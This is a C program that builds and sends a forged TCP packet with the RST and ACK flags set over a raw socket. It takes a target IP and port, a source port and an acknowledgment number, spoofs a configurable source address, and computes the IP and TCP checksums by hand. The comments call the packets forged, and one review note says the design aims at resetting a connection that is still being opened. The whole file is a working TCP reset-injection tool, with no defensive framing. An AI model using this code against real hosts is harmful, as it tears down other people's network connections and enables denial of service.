#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/tcp.h>
#include <linux/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define BUFSIZE 512

int tcp_reset(struct sockaddr_in *, int, u_int32_t);
u_short in_checksum(unsigned short *, int);

/*
 * Parse s as an unsigned integer no greater than max and store it in *out.
 * Accepts decimal, or hexadecimal with a 0x/0X prefix.  Rejects empty input,
 * signs, leading whitespace, trailing characters and out-of-range values.
 * Returns 0 on success and -1 on error (leaving *out untouched).
 */
static int parse_uint(const char *s, unsigned long max, unsigned long *out)
{
	int base = 10;
	char *end;
	unsigned long v;

	/* strtoul() would skip whitespace and silently wrap a leading '-'. */
	if (*s < '0' || *s > '9')
		return -1;
	if (s[0] == '0' && (s[1] == 'x' || s[1] == 'X'))
		base = 16;

	errno = 0;
	v = strtoul(s, &end, base);
	if (errno != 0 || *end != '\0' || v > max)
		return -1;

	*out = v;
	return 0;
}

/*
 * Usage: <prog> <ip> <port> <sport> <seq>
 *
 * Validates the arguments, then asks tcp_reset() to send one RST+ACK segment
 * to <ip>:<port> from source port <sport> with acknowledgment number <seq>.
 * Exits 0 if the packet was sent and 1 on any error.
 */
int main(int argc, char **argv)
{
	struct sockaddr_in dest;
	unsigned long dport, sport, seq;

	if (argc != 5) {
		fprintf(stderr, "Usage: %s <ip> <port> <sport> <seq>\n", argv[0]);
		exit(1);
	}

	/* Zero the whole struct so sin_zero is not left uninitialized. */
	memset(&dest, 0, sizeof dest);
	dest.sin_family = AF_INET;

	/*
	 * inet_pton() reports malformed input; inet_addr() cannot, because its
	 * error value INADDR_NONE is also the valid address 255.255.255.255.
	 */
	if (inet_pton(AF_INET, argv[1], &dest.sin_addr) != 1) {
		fprintf(stderr, "Invalid IPv4 address: %s\n", argv[1]);
		exit(1);
	}

	if (parse_uint(argv[2], 65535, &dport) != 0) {
		fprintf(stderr, "Invalid port: %s\n", argv[2]);
		exit(1);
	}

	if (parse_uint(argv[3], 65535, &sport) != 0) {
		fprintf(stderr, "Invalid source port: %s\n", argv[3]);
		exit(1);
	}

	/* Parse the 32-bit number exactly instead of round-tripping a double. */
	if (parse_uint(argv[4], UINT32_MAX, &seq) != 0) {
		fprintf(stderr, "Invalid sequence number: %s\n", argv[4]);
		exit(1);
	}

	dest.sin_port = htons((uint16_t) dport);

	if (tcp_reset(&dest, (int) sport, (u_int32_t) seq) != 0) {
		fprintf(stderr, "Send failed\n");
		exit(1);
	}

	printf("Packet sent\n");

	exit(0);
}

/*
 * Source IPv4 address written into every forged RST.  It is set explicitly,
 * rather than left zero for the kernel to fill in, because the TCP checksum
 * covers it.  Override at build time with -DRST_SRC_ADDR='"a.b.c.d"'.
 */
#ifndef RST_SRC_ADDR
#define RST_SRC_ADDR "192.168.0.3"
#endif

/* IPv4 header checksum, computed over a word-typed copy to avoid aliasing the struct. */
static unsigned short ip_header_checksum(const struct iphdr *ip)
{
	unsigned short words[sizeof(struct iphdr) / 2];

	memcpy(words, ip, sizeof words);
	return in_checksum(words, (int) sizeof words);
}

/*
 * TCP checksum of a payload-less segment.  This is the Internet checksum
 * over the 12-byte IPv4 pseudo-header (source address, destination address,
 * zero byte, protocol, TCP length) followed by the TCP header
 * (RFC 793, section 3.1).  tcp->check must be 0 when this is called.
 */
static unsigned short tcp_checksum(const struct iphdr *ip, const struct tcphdr *tcp)
{
	unsigned short words[(12 + sizeof(struct tcphdr)) / 2];
	unsigned char *p = (unsigned char *) words;
	uint16_t tcp_len = htons((uint16_t) sizeof *tcp);

	memcpy(p, &ip->saddr, 4);
	memcpy(p + 4, &ip->daddr, 4);
	p[8] = 0;
	p[9] = ip->protocol;
	memcpy(p + 10, &tcp_len, 2);
	memcpy(p + 12, tcp, sizeof *tcp);
	return in_checksum(words, (int) sizeof words);
}

/*
 * Send one hand-built IPv4/TCP segment with the RST and ACK flags set.
 *
 *   dst    destination address and port (port in network byte order).
 *          dst->sin_addr is written into the IP header and also passed to
 *          sendto(), so the two always agree.
 *   sport  TCP source port, in host byte order.
 *   seq    acknowledgment number, in host byte order.  The segment's own
 *          sequence number is 0.
 *
 * NOTE(review): SEQ=0 with ACK=seq looks aimed at a peer in SYN-SENT, which
 * accepts an RST whose ACK acknowledges its SYN.  Confirm the intent.
 *
 * Requires a raw socket (root or CAP_NET_RAW).  Returns 0 on success and 1 on
 * any failure, after printing a diagnostic.
 */
int tcp_reset(struct sockaddr_in *dst, int sport, u_int32_t seq)
{
	const int on = 1;
	struct iphdr iph;
	struct tcphdr tcph;
	struct in_addr src;
	unsigned char pkt[sizeof(struct iphdr) + sizeof(struct tcphdr)];
	ssize_t sent;
	int sockfd;
	int rc = 1;

	if (inet_pton(AF_INET, RST_SRC_ADDR, &src) != 1) {
		fprintf(stderr, "invalid RST_SRC_ADDR: %s\n", RST_SRC_ADDR);
		return 1;
	}

	// Build IP header: 20 bytes (ihl = 5 words), no options.

	memset(&iph, 0, sizeof iph);

	iph.version  = 4;
	iph.ihl      = 5;
	iph.tos      = 0;
	iph.tot_len  = htons((uint16_t) sizeof pkt);
	iph.id       = rand() & 0xffff;
	iph.frag_off = 0;
	iph.ttl      = 255;
	iph.protocol = IPPROTO_TCP;
	iph.saddr    = src.s_addr;
	iph.daddr    = dst->sin_addr.s_addr;	/* must match the sendto() target */
	iph.check    = 0;
	/* On Linux the kernel also fills this in for IP_HDRINCL (raw(7)). */
	iph.check    = ip_header_checksum(&iph);

	// Build TCP header: 20 bytes (doff = 5 words), no options, no payload.

	memset(&tcph, 0, sizeof tcph);

	tcph.source  = htons((uint16_t) sport);
	tcph.dest    = dst->sin_port;
	tcph.seq     = htonl(0);
	tcph.ack_seq = htonl(seq);
	tcph.doff    = 5;
	tcph.rst     = 1;
	tcph.ack     = 1;
	tcph.window  = htons(1024);
	tcph.urg_ptr = 0;
	tcph.check   = 0;
	/* The kernel never fills in the TCP checksum; it must include the pseudo-header. */
	tcph.check   = tcp_checksum(&iph, &tcph);

	// Assemble and send the packet.

	memcpy(pkt, &iph, sizeof iph);
	memcpy(pkt + sizeof iph, &tcph, sizeof tcph);

	sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (sockfd < 0) {
		perror("socket");
		return 1;
	}

	if (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof on) < 0) {
		perror("setsockopt");
		goto out;
	}

	sent = sendto(sockfd, pkt, sizeof pkt, 0, (struct sockaddr *) dst, sizeof *dst);
	if (sent < 0) {
		perror("sendto");
		goto out;
	}
	if ((size_t) sent != sizeof pkt) {
		fprintf(stderr, "sendto: short send (%zd of %zu bytes)\n", sent, sizeof pkt);
		goto out;
	}

	rc = 0;

out:
	/* Release the socket on every path after it was opened. */
	close(sockfd);
	return rc;
}

/*
 * Compute the Internet checksum (RFC 1071) of len bytes starting at addr.
 * This is the one's complement of the one's complement sum of the data taken
 * as 16-bit words.  An odd trailing byte is padded with a zero byte; no byte
 * past addr[len - 1] is read.
 *
 * The data is copied out byte-wise, so addr may point at any object (e.g. a
 * packet header struct) and need not be 2-byte aligned.  As RFC 1071 notes,
 * the sum is byte-order independent: the result can be stored into a
 * header's checksum field as-is, without htons().
 *
 * Returns 0xffff when len <= 0.
 */
unsigned short in_checksum(unsigned short *addr, int len)
{
	const unsigned char *bytes = (const unsigned char *) addr;
	uint64_t sum = 0;	/* wide enough that no realistic len can overflow it */
	unsigned short word;

	for (; len > 1; len -= 2, bytes += 2) {
		memcpy(&word, bytes, sizeof word);
		sum += word;
	}

	if (len == 1) {
		/* Pad the lone final byte with zero instead of reading past the buffer. */
		unsigned char pad[2] = { bytes[0], 0 };

		memcpy(&word, pad, sizeof word);
		sum += word;
	}

	/* Fold carries back into the low 16 bits until none remain. */
	while (sum >> 16)
		sum = (sum & 0xffff) + (sum >> 16);

	return (unsigned short) ~sum;
}
